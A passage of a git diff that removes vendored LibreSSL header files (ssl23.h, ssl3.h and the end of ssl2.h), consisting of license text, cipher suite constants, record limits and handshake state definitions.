-#define SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER	16383	/* 2^14-1 */
-
-#define SSL2_CHALLENGE_LENGTH	16
-/*#define SSL2_CHALLENGE_LENGTH	32 */
-#define SSL2_MIN_CHALLENGE_LENGTH	16
-#define SSL2_MAX_CHALLENGE_LENGTH	32
-#define SSL2_CONNECTION_ID_LENGTH	16
-#define SSL2_MAX_CONNECTION_ID_LENGTH	16
-#define SSL2_SSL_SESSION_ID_LENGTH	16
-#define SSL2_MAX_CERT_CHALLENGE_LENGTH	32
-#define SSL2_MIN_CERT_CHALLENGE_LENGTH	16
-#define SSL2_MAX_KEY_MATERIAL_LENGTH	24
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl23.h b/thirdparty/libressl/include/openssl/ssl23.h
deleted file mode 100644
index 570e4b0..0000000
--- a/thirdparty/libressl/include/openssl/ssl23.h
+++ /dev/null
@@ -1,82 +0,0 @@
-/* $OpenBSD: ssl23.h,v 1.4 2014/12/14 15:30:50 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_SSL23_H
-#define HEADER_SSL23_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/*client */
-/* write to server */
-#define SSL23_ST_CW_CLNT_HELLO_A	(0x210|SSL_ST_CONNECT)
-#define SSL23_ST_CW_CLNT_HELLO_B	(0x211|SSL_ST_CONNECT)
-/* read from server */
-#define SSL23_ST_CR_SRVR_HELLO_A	(0x220|SSL_ST_CONNECT)
-#define SSL23_ST_CR_SRVR_HELLO_B	(0x221|SSL_ST_CONNECT)
-
-/* server */
-/* read from client */
-#define SSL23_ST_SR_CLNT_HELLO_A	(0x210|SSL_ST_ACCEPT)
-#define SSL23_ST_SR_CLNT_HELLO_B	(0x211|SSL_ST_ACCEPT)
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl3.h b/thirdparty/libressl/include/openssl/ssl3.h
deleted file mode 100644
index 12ef56b..0000000
--- a/thirdparty/libressl/include/openssl/ssl3.h
+++ /dev/null
@@ -1,505 +0,0 @@
-/* $OpenBSD: ssl3.h,v 1.46 2017/08/28 17:36:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECC cipher suite support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_SSL3_H
-#define HEADER_SSL3_H
-
-#include <openssl/opensslconf.h>
-#include <openssl/buffer.h>
-#include <openssl/evp.h>
-#include <openssl/ssl.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* TLS_EMPTY_RENEGOTIATION_INFO_SCSV from RFC 5746. */
-#define SSL3_CK_SCSV				0x030000FF
-
-/* TLS_FALLBACK_SCSV from draft-ietf-tls-downgrade-scsv-03. */
-#define SSL3_CK_FALLBACK_SCSV			0x03005600
-
-#define SSL3_CK_RSA_NULL_MD5			0x03000001
-#define SSL3_CK_RSA_NULL_SHA			0x03000002
-#define SSL3_CK_RSA_RC4_40_MD5 			0x03000003
-#define SSL3_CK_RSA_RC4_128_MD5			0x03000004
-#define SSL3_CK_RSA_RC4_128_SHA			0x03000005
-#define SSL3_CK_RSA_RC2_40_MD5			0x03000006
-#define SSL3_CK_RSA_IDEA_128_SHA		0x03000007
-#define SSL3_CK_RSA_DES_40_CBC_SHA		0x03000008
-#define SSL3_CK_RSA_DES_64_CBC_SHA		0x03000009
-#define SSL3_CK_RSA_DES_192_CBC3_SHA		0x0300000A
-
-#define SSL3_CK_DH_DSS_DES_40_CBC_SHA		0x0300000B
-#define SSL3_CK_DH_DSS_DES_64_CBC_SHA		0x0300000C
-#define SSL3_CK_DH_DSS_DES_192_CBC3_SHA 	0x0300000D
-#define SSL3_CK_DH_RSA_DES_40_CBC_SHA		0x0300000E
-#define SSL3_CK_DH_RSA_DES_64_CBC_SHA		0x0300000F
-#define SSL3_CK_DH_RSA_DES_192_CBC3_SHA 	0x03000010
-
-#define SSL3_CK_EDH_DSS_DES_40_CBC_SHA		0x03000011
-#define SSL3_CK_EDH_DSS_DES_64_CBC_SHA		0x03000012
-#define SSL3_CK_EDH_DSS_DES_192_CBC3_SHA	0x03000013
-#define SSL3_CK_EDH_RSA_DES_40_CBC_SHA		0x03000014
-#define SSL3_CK_EDH_RSA_DES_64_CBC_SHA		0x03000015
-#define SSL3_CK_EDH_RSA_DES_192_CBC3_SHA	0x03000016
-
-#define SSL3_CK_ADH_RC4_40_MD5			0x03000017
-#define SSL3_CK_ADH_RC4_128_MD5			0x03000018
-#define SSL3_CK_ADH_DES_40_CBC_SHA		0x03000019
-#define SSL3_CK_ADH_DES_64_CBC_SHA		0x0300001A
-#define SSL3_CK_ADH_DES_192_CBC_SHA		0x0300001B
-
-/*    VRS Additional Kerberos5 entries
- */
-#define SSL3_CK_KRB5_DES_64_CBC_SHA		0x0300001E
-#define SSL3_CK_KRB5_DES_192_CBC3_SHA		0x0300001F
-#define SSL3_CK_KRB5_RC4_128_SHA		0x03000020
-#define SSL3_CK_KRB5_IDEA_128_CBC_SHA	       	0x03000021
-#define SSL3_CK_KRB5_DES_64_CBC_MD5       	0x03000022
-#define SSL3_CK_KRB5_DES_192_CBC3_MD5       	0x03000023
-#define SSL3_CK_KRB5_RC4_128_MD5	       	0x03000024
-#define SSL3_CK_KRB5_IDEA_128_CBC_MD5 		0x03000025
-
-#define SSL3_CK_KRB5_DES_40_CBC_SHA 		0x03000026
-#define SSL3_CK_KRB5_RC2_40_CBC_SHA 		0x03000027
-#define SSL3_CK_KRB5_RC4_40_SHA	 		0x03000028
-#define SSL3_CK_KRB5_DES_40_CBC_MD5 		0x03000029
-#define SSL3_CK_KRB5_RC2_40_CBC_MD5 		0x0300002A
-#define SSL3_CK_KRB5_RC4_40_MD5	 		0x0300002B
-
-#define SSL3_TXT_RSA_NULL_MD5			"NULL-MD5"
-#define SSL3_TXT_RSA_NULL_SHA			"NULL-SHA"
-#define SSL3_TXT_RSA_RC4_40_MD5 		"EXP-RC4-MD5"
-#define SSL3_TXT_RSA_RC4_128_MD5		"RC4-MD5"
-#define SSL3_TXT_RSA_RC4_128_SHA		"RC4-SHA"
-#define SSL3_TXT_RSA_RC2_40_MD5			"EXP-RC2-CBC-MD5"
-#define SSL3_TXT_RSA_IDEA_128_SHA		"IDEA-CBC-SHA"
-#define SSL3_TXT_RSA_DES_40_CBC_SHA		"EXP-DES-CBC-SHA"
-#define SSL3_TXT_RSA_DES_64_CBC_SHA		"DES-CBC-SHA"
-#define SSL3_TXT_RSA_DES_192_CBC3_SHA		"DES-CBC3-SHA"
-
-#define SSL3_TXT_DH_DSS_DES_40_CBC_SHA		"EXP-DH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_DH_DSS_DES_64_CBC_SHA		"DH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_DH_DSS_DES_192_CBC3_SHA 	"DH-DSS-DES-CBC3-SHA"
-#define SSL3_TXT_DH_RSA_DES_40_CBC_SHA		"EXP-DH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_DH_RSA_DES_64_CBC_SHA		"DH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_DH_RSA_DES_192_CBC3_SHA 	"DH-RSA-DES-CBC3-SHA"
-
-#define SSL3_TXT_EDH_DSS_DES_40_CBC_SHA		"EXP-EDH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_EDH_DSS_DES_64_CBC_SHA		"EDH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_EDH_DSS_DES_192_CBC3_SHA	"EDH-DSS-DES-CBC3-SHA"
-#define SSL3_TXT_EDH_RSA_DES_40_CBC_SHA		"EXP-EDH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_EDH_RSA_DES_64_CBC_SHA		"EDH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_EDH_RSA_DES_192_CBC3_SHA	"EDH-RSA-DES-CBC3-SHA"
-
-#define SSL3_TXT_ADH_RC4_40_MD5			"EXP-ADH-RC4-MD5"
-#define SSL3_TXT_ADH_RC4_128_MD5		"ADH-RC4-MD5"
-#define SSL3_TXT_ADH_DES_40_CBC_SHA		"EXP-ADH-DES-CBC-SHA"
-#define SSL3_TXT_ADH_DES_64_CBC_SHA		"ADH-DES-CBC-SHA"
-#define SSL3_TXT_ADH_DES_192_CBC_SHA		"ADH-DES-CBC3-SHA"
-
-#define SSL3_TXT_KRB5_DES_64_CBC_SHA		"KRB5-DES-CBC-SHA"
-#define SSL3_TXT_KRB5_DES_192_CBC3_SHA		"KRB5-DES-CBC3-SHA"
-#define SSL3_TXT_KRB5_RC4_128_SHA		"KRB5-RC4-SHA"
-#define SSL3_TXT_KRB5_IDEA_128_CBC_SHA	       	"KRB5-IDEA-CBC-SHA"
-#define SSL3_TXT_KRB5_DES_64_CBC_MD5       	"KRB5-DES-CBC-MD5"
-#define SSL3_TXT_KRB5_DES_192_CBC3_MD5       	"KRB5-DES-CBC3-MD5"
-#define SSL3_TXT_KRB5_RC4_128_MD5		"KRB5-RC4-MD5"
-#define SSL3_TXT_KRB5_IDEA_128_CBC_MD5 		"KRB5-IDEA-CBC-MD5"
-
-#define SSL3_TXT_KRB5_DES_40_CBC_SHA 		"EXP-KRB5-DES-CBC-SHA"
-#define SSL3_TXT_KRB5_RC2_40_CBC_SHA 		"EXP-KRB5-RC2-CBC-SHA"
-#define SSL3_TXT_KRB5_RC4_40_SHA	 	"EXP-KRB5-RC4-SHA"
-#define SSL3_TXT_KRB5_DES_40_CBC_MD5 		"EXP-KRB5-DES-CBC-MD5"
-#define SSL3_TXT_KRB5_RC2_40_CBC_MD5 		"EXP-KRB5-RC2-CBC-MD5"
-#define SSL3_TXT_KRB5_RC4_40_MD5	 	"EXP-KRB5-RC4-MD5"
-
-#define SSL3_SSL_SESSION_ID_LENGTH		32
-#define SSL3_MAX_SSL_SESSION_ID_LENGTH		32
-
-#define SSL3_MASTER_SECRET_SIZE			48
-#define SSL3_RANDOM_SIZE			32
-#define SSL3_SEQUENCE_SIZE			8
-#define SSL3_SESSION_ID_SIZE			32
-#define SSL3_CIPHER_VALUE_SIZE			2
-
-#define SSL3_RT_HEADER_LENGTH			5
-#define SSL3_HM_HEADER_LENGTH			4
-
-#define SSL3_ALIGN_PAYLOAD			8
-
-/* This is the maximum MAC (digest) size used by the SSL library.
- * Currently maximum of 20 is used by SHA1, but we reserve for
- * future extension for 512-bit hashes.
- */
-
-#define SSL3_RT_MAX_MD_SIZE			64
-
-/* Maximum block size used in all ciphersuites. Currently 16 for AES.
- */
-
-#define	SSL_RT_MAX_CIPHER_BLOCK_SIZE		16
-
-#define SSL3_RT_MAX_EXTRA			(16384)
-
-/* Maximum plaintext length: defined by SSL/TLS standards */
-#define SSL3_RT_MAX_PLAIN_LENGTH		16384
-/* Maximum compression overhead: defined by SSL/TLS standards */
-#define SSL3_RT_MAX_COMPRESSED_OVERHEAD		1024
-
-/* The standards give a maximum encryption overhead of 1024 bytes.
- * In practice the value is lower than this. The overhead is the maximum
- * number of padding bytes (256) plus the mac size.
- */
-#define SSL3_RT_MAX_ENCRYPTED_OVERHEAD	(256 + SSL3_RT_MAX_MD_SIZE)
-
-/* OpenSSL currently only uses a padding length of at most one block so
- * the send overhead is smaller.
- */
-
-#define SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD \
-			(SSL_RT_MAX_CIPHER_BLOCK_SIZE + SSL3_RT_MAX_MD_SIZE)
-
-/* If compression isn't used don't include the compression overhead */
-#define SSL3_RT_MAX_COMPRESSED_LENGTH		SSL3_RT_MAX_PLAIN_LENGTH
-#define SSL3_RT_MAX_ENCRYPTED_LENGTH	\
-		(SSL3_RT_MAX_ENCRYPTED_OVERHEAD+SSL3_RT_MAX_COMPRESSED_LENGTH)
-#define SSL3_RT_MAX_PACKET_SIZE		\
-		(SSL3_RT_MAX_ENCRYPTED_LENGTH+SSL3_RT_HEADER_LENGTH)
-
-#define SSL3_MD_CLIENT_FINISHED_CONST	"\x43\x4C\x4E\x54"
-#define SSL3_MD_SERVER_FINISHED_CONST	"\x53\x52\x56\x52"
-
-#define SSL3_VERSION			0x0300
-#define SSL3_VERSION_MAJOR		0x03
-#define SSL3_VERSION_MINOR		0x00
-
-#define SSL3_RT_CHANGE_CIPHER_SPEC	20
-#define SSL3_RT_ALERT			21
-#define SSL3_RT_HANDSHAKE		22
-#define SSL3_RT_APPLICATION_DATA	23
-#define TLS1_RT_HEARTBEAT		24
-
-#define SSL3_AL_WARNING			1
-#define SSL3_AL_FATAL			2
-
-#define SSL3_AD_CLOSE_NOTIFY		 0
-#define SSL3_AD_UNEXPECTED_MESSAGE	10	/* fatal */
-#define SSL3_AD_BAD_RECORD_MAC		20	/* fatal */
-#define SSL3_AD_DECOMPRESSION_FAILURE	30	/* fatal */
-#define SSL3_AD_HANDSHAKE_FAILURE	40	/* fatal */
-#define SSL3_AD_NO_CERTIFICATE		41
-#define SSL3_AD_BAD_CERTIFICATE		42
-#define SSL3_AD_UNSUPPORTED_CERTIFICATE	43
-#define SSL3_AD_CERTIFICATE_REVOKED	44
-#define SSL3_AD_CERTIFICATE_EXPIRED	45
-#define SSL3_AD_CERTIFICATE_UNKNOWN	46
-#define SSL3_AD_ILLEGAL_PARAMETER	47	/* fatal */
-
-#define TLS1_HB_REQUEST		1
-#define TLS1_HB_RESPONSE	2
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-typedef struct ssl3_record_st {
-/*r */	int type;               /* type of record */
-/*rw*/	unsigned int length;    /* How many bytes available */
-/*r */	unsigned int off;       /* read/write offset into 'buf' */
-/*rw*/	unsigned char *data;    /* pointer to the record data */
-/*rw*/	unsigned char *input;   /* where the decode bytes are */
-/*r */  unsigned long epoch;    /* epoch number, needed by DTLS1 */
-/*r */  unsigned char seq_num[8]; /* sequence number, needed by DTLS1 */
-} SSL3_RECORD;
-
-typedef struct ssl3_buffer_st {
-	unsigned char *buf;	/* at least SSL3_RT_MAX_PACKET_SIZE bytes,
-	                         * see ssl3_setup_buffers() */
-	size_t len;		/* buffer size */
-	int offset;		/* where to 'copy from' */
-	int left;		/* how many bytes left */
-} SSL3_BUFFER;
-
-#endif
-
-#define SSL3_CT_RSA_SIGN			1
-#define SSL3_CT_DSS_SIGN			2
-#define SSL3_CT_RSA_FIXED_DH			3
-#define SSL3_CT_DSS_FIXED_DH			4
-#define SSL3_CT_RSA_EPHEMERAL_DH		5
-#define SSL3_CT_DSS_EPHEMERAL_DH		6
-#define SSL3_CT_FORTEZZA_DMS			20
-/* SSL3_CT_NUMBER is used to size arrays and it must be large
- * enough to contain all of the cert types defined either for
- * SSLv3 and TLSv1.
- */
-#define SSL3_CT_NUMBER			11
-
-
-#define SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS	0x0001
-#define SSL3_FLAGS_DELAY_CLIENT_FINISHED	0x0002
-#define SSL3_FLAGS_POP_BUFFER			0x0004
-#define TLS1_FLAGS_TLS_PADDING_BUG		0x0
-#define TLS1_FLAGS_SKIP_CERT_VERIFY		0x0010
-#define TLS1_FLAGS_KEEP_HANDSHAKE		0x0020
-#define SSL3_FLAGS_CCS_OK			0x0080
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-struct ssl3_state_internal_st;
-
-typedef struct ssl3_state_st {
-	long flags;
-
-	unsigned char server_random[SSL3_RANDOM_SIZE];
-	unsigned char client_random[SSL3_RANDOM_SIZE];
-
-	SSL3_BUFFER rbuf;	/* read IO goes into here */
-	SSL3_BUFFER wbuf;	/* write IO goes into here */
-
-	/* we allow one fatal and one warning alert to be outstanding,
-	 * send close alert via the warning alert */
-	int alert_dispatch;
-	unsigned char send_alert[2];
-
-	struct {
-		int new_mac_secret_size;
-	} tmp;
-
-	struct ssl3_state_internal_st *internal;
-} SSL3_STATE;
-
-#endif
-
-/* SSLv3 */
-/*client */
-/* extra state */
-#define SSL3_ST_CW_FLUSH			(0x100|SSL_ST_CONNECT)
-/* write to server */
-#define SSL3_ST_CW_CLNT_HELLO_A			(0x110|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CLNT_HELLO_B			(0x111|SSL_ST_CONNECT)
-/* read from server */
-#define SSL3_ST_CR_SRVR_HELLO_A			(0x120|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_HELLO_B			(0x121|SSL_ST_CONNECT)
-#define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A	(0x126|SSL_ST_CONNECT)
-#define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B	(0x127|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_A			(0x130|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_B			(0x131|SSL_ST_CONNECT)
-#define SSL3_ST_CR_KEY_EXCH_A			(0x140|SSL_ST_CONNECT)
-#define SSL3_ST_CR_KEY_EXCH_B			(0x141|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_REQ_A			(0x150|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_REQ_B			(0x151|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_DONE_A			(0x160|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_DONE_B			(0x161|SSL_ST_CONNECT)
-/* write to server */
-#define SSL3_ST_CW_CERT_A			(0x170|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_B			(0x171|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_C			(0x172|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_D			(0x173|SSL_ST_CONNECT)
-#define SSL3_ST_CW_KEY_EXCH_A			(0x180|SSL_ST_CONNECT)
-#define SSL3_ST_CW_KEY_EXCH_B			(0x181|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_VRFY_A			(0x190|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_VRFY_B			(0x191|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CHANGE_A			(0x1A0|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CHANGE_B			(0x1A1|SSL_ST_CONNECT)
-#define SSL3_ST_CW_FINISHED_A			(0x1B0|SSL_ST_CONNECT)
-#define SSL3_ST_CW_FINISHED_B			(0x1B1|SSL_ST_CONNECT)
-/* read from server */
-#define SSL3_ST_CR_CHANGE_A			(0x1C0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CHANGE_B			(0x1C1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_FINISHED_A			(0x1D0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_FINISHED_B			(0x1D1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SESSION_TICKET_A		(0x1E0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SESSION_TICKET_B		(0x1E1|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_STATUS_A		(0x1F0|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_STATUS_B		(0x1F1|SSL_ST_CONNECT)
-
-/* server */
-/* extra state */
-#define SSL3_ST_SW_FLUSH			(0x100|SSL_ST_ACCEPT)
-/* read from client */
-/* Do not change the number values, they do matter */
-#define SSL3_ST_SR_CLNT_HELLO_A			(0x110|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CLNT_HELLO_B			(0x111|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CLNT_HELLO_C			(0x112|SSL_ST_ACCEPT)
-/* write to client */
-#define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A	(0x113|SSL_ST_ACCEPT)
-#define DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B	(0x114|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_A			(0x120|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_B			(0x121|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_HELLO_REQ_C			(0x122|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_HELLO_A			(0x130|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_HELLO_B			(0x131|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_A			(0x140|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_B			(0x141|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_KEY_EXCH_A			(0x150|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_KEY_EXCH_B			(0x151|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_REQ_A			(0x160|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CERT_REQ_B			(0x161|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_DONE_A			(0x170|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_SRVR_DONE_B			(0x171|SSL_ST_ACCEPT)
-/* read from client */
-#define SSL3_ST_SR_CERT_A			(0x180|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_B			(0x181|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_KEY_EXCH_A			(0x190|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_KEY_EXCH_B			(0x191|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_VRFY_A			(0x1A0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CERT_VRFY_B			(0x1A1|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CHANGE_A			(0x1B0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_CHANGE_B			(0x1B1|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_FINISHED_A			(0x1C0|SSL_ST_ACCEPT)
-#define SSL3_ST_SR_FINISHED_B			(0x1C1|SSL_ST_ACCEPT)
-/* write to client */
-#define SSL3_ST_SW_CHANGE_A			(0x1D0|SSL_ST_ACCEPT)
-#define SSL3_ST_SW_CHANGE_B			(0x1D1|SSL_ST_ACCEPT)
